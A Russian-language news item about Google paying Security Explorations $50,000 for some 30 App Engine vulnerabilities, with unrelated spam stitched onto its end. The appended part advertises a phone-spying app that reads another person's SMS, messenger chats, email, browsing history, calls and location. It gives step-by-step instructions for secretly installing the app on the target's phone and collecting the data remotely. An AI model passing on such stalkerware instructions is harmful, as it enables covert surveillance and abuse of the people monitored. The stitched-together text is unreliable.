За обнаружение уязвимости в App Engine корпорация Google выплатила $50 000

60db2bc2b9eb59599b3e571847f49e5d

Эксперты компании Security Explorations, которая базируется в Польше, в конце прошлого года представили концепты нескольких десятков уязвимостей в Google App Engine. За это поисковый гигант выплатил специалистам 50 тысяч долларов, что является рекордом для подобного вознаграждения.

Исследователи провели детальное изучение уязвимостей GAE, в итоге количество найденных брешей достигло 30. Причём для 20 из них уже были готовы коды, способные произвести нужное исправление. Во время предварительного исследования учётные записи Security Explorations были заблокированы, однако затем поисковый гигант позволил завершить проверку. По результатам и было выплачено вознаграждение.

Деятельностью польской компании заинтересовались и в Oracle. Запланирован подробный аудит Java. Как сообщают исследователи из Security Explorations, уже подписано соглашение о дальнейшем сотрудничестве. Что касается полученных 50 тысяч долларов, сотрудники компании планируют потратить их на реализацию нескольких некоммерческих проектов, также направленных на проверки в области безопасности.

Политика Google, нацеленная на поощрение специалистов, обнаруживающих бреши в их программных продуктах, действует уже несколько лет. Именно массовостью выявленных дыр (около 30) объясняется столь большая сумма, выплаченная Security Explorations. Стандартное же вознаграждение начинается от тысячи долларов за уязвимость. Ежегодно на подобную программу поисковый гигант планирует тратить до одного миллиона долларов. В дальнейшем эти затраты многократно окупаются и предотвращают появление убытков.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.